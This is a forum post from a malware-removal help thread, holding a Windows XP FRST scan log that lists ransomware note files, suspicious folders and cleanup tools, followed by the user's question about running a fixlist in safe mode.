2014-07-23 09:33 - 2014-07-24 22:59 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-22 22:50 - 2014-08-04 17:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-07-22 22:50 - 2014-07-23 17:47 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 17:20 - 2014-08-06 16:26 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-07 17:20 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp
2014-08-07 17:19 - 2014-08-06 13:51 - 00000000 ____D () C:\FRST
2014-08-07 17:18 - 2012-08-20 19:07 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
2014-08-07 17:18 - 2008-04-14 13:00 - 00013646 _____ () C:\WINDOWS\system32\wpa.dbl
2014-08-07 17:11 - 2014-08-04 17:04 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-07 17:11 - 2014-08-04 16:56 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-07 17:11 - 2012-08-22 11:16 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-08-07 17:11 - 2012-08-20 19:07 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-08-07 16:26 - 2014-08-07 16:23 - 00000000 ___SD () C:\ComboFix
2014-08-07 14:48 - 2014-08-04 17:04 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-07 14:48 - 2014-08-01 09:51 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-07 14:47 - 2012-08-20 19:10 - 00000098 ___SH () C:\Documents and Settings\Konstantine Trivizas\ntuser.ini
2014-08-07 14:31 - 2014-08-05 15:43 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-07 14:31 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-07 14:29 - 2012-08-22 10:36 - 00011994 _____ () C:\WINDOWS\system32\nvModes.001
2014-08-07 14:29 - 2004-10-26 12:01 - 00017112 _____ () C:\WINDOWS\system32\nvapps.xml
2014-08-07 14:25 - 2012-08-20 19:10 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas
2014-08-07 14:24 - 2012-10-16 19:18 - 00000308 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:22 - 2013-02-21 00:09 - 00000910 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-07 14:22 - 2013-01-02 19:40 - 00000308 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-07 14:21 - 2014-08-04 17:04 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-07 14:20 - 2012-08-22 04:48 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB978695_WM9$
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2012-08-20 16:12 - 00000327 __RSH () C:\boot.ini
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:03 - 2013-02-21 00:09 - 00000914 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-07 11:50 - 2012-08-23 12:38 - 00001038 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001UA.job
2014-08-07 11:49 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-08-07 11:42 - 2014-08-07 11:41 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:32 - 2014-08-06 16:31 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:24 - 2014-08-04 17:11 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-06 15:51 - 2012-08-23 12:38 - 00000986 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1004336348-1563985344-1343024091-1001Core.job
2014-08-06 14:38 - 2014-08-06 14:37 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-05 18:29 - 2014-08-04 17:10 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-05 17:15 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 17:15 - 2012-08-22 04:49 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2695962$
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:39 - 2014-08-05 12:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-05 15:38 - 2014-08-05 14:02 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:34 - 2014-08-05 15:33 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:12 - 2013-01-02 19:40 - 00000316 _____ () C:\WINDOWS\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-08-05 13:41 - 2014-08-05 13:40 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:41 - 2014-08-05 13:40 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:41 - 2014-08-05 13:39 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:41 - 2014-08-05 13:38 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:41 - 2014-08-05 13:32 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:37 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\system32\mui
2014-08-05 13:36 - 2014-08-05 13:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:42 - 2012-08-22 04:52 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB971657$
2014-08-05 12:41 - 2012-08-22 16:05 - 00131072 _____ () C:\WINDOWS\system32\config\OAlerts.evt
2014-08-04 17:48 - 2008-04-14 13:00 - 00000582 _____ () C:\WINDOWS\win.ini
2014-08-04 17:48 - 2008-04-14 13:00 - 00000227 _____ () C:\WINDOWS\system.ini
2014-08-04 17:39 - 2012-08-22 05:04 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB959426$
2014-08-04 17:37 - 2012-08-22 16:43 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Adobe
2014-08-04 17:15 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Xihoh
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 17:02 - 2014-08-04 16:54 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 17:02 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 17:00 - 2014-08-04 16:59 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-04 16:54 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 12:03 - 2012-08-24 10:26 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\CAREER & INCOME
2014-08-04 11:10 - 2012-08-28 20:01 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\My Documents\AEOLUS HOSPITALITY
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 10:48 - 2013-02-04 20:06 - 00000000 ____D () C:\WINDOWS\Minidump
2014-08-01 10:14 - 2014-08-01 09:51 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:55 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Skype
2014-08-01 09:52 - 2012-08-22 12:28 - 00000000 ____D () C:\WINDOWS\Microsoft.NET
2014-08-01 09:50 - 2014-08-01 09:43 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:50 - 2014-08-01 09:42 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:49 - 2013-01-02 19:40 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\RealNetworks
2014-08-01 09:49 - 2012-10-16 19:16 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Real
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-04 16:54 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2013-02-23 13:08 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Skype
2014-08-01 09:47 - 2013-01-02 19:38 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\RealNetworks
2014-08-01 09:47 - 2012-08-20 18:59 - 00000000 ___RD () C:\Documents and Settings\All Users\Start Menu\Programs\Accessories
2014-08-01 09:46 - 2012-10-16 19:11 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Real
2014-08-01 09:42 - 2014-08-01 09:40 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:42 - 2012-08-20 16:05 - 00000000 ____D () C:\WINDOWS\Help
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-30 18:30 - 2012-10-16 19:18 - 00000316 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1004336348-1563985344-1343024091-1001.job
2014-07-30 10:04 - 2012-09-03 19:24 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-07-24 23:21 - 2012-08-23 12:40 - 00002393 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Google Chrome.lnk
2014-07-24 23:10 - 2012-08-23 12:37 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google
2014-07-24 22:59 - 2014-07-23 09:33 - 00000759 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2014-07-24 21:06 - 2014-07-24 20:44 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
2014-07-24 21:03 - 2013-11-01 13:17 - 00000000 ___HD () C:\DrFoneForAndroid
2014-07-24 21:03 - 2012-08-23 11:06 - 00000000 ____D () C:\WINDOWS\system32\NtmsData
2014-07-24 20:44 - 2014-07-24 20:44 - 00001810 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\1-Click Cleaning by Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000798 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Your Uninstaller! 2008.lnk
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\URSoft
2014-07-24 20:44 - 2014-07-24 20:44 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Your Uninstaller! 2008
2014-07-23 17:47 - 2014-07-22 22:50 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Epme
 
Some content of TEMP:
====================
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\70253a8e-3c9f-4d22-bd36-b8d19f4791c5.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\71e80baa-31c7-4340-91d3-25d57739bca6.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\catchme.dll
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\f47520ff-a754-403a-a719-51c1c4b8b4fd.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\jre-7u65-windows-i586-iftw.exe
C:\Documents and Settings\Konstantine Trivizas\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== End Of Log ============================


So I will copy the fixlist.txt from this PC to the other via USB and I will then run it and fix. Is all of that possible in safe mode?

This topic is now closed to further replies.
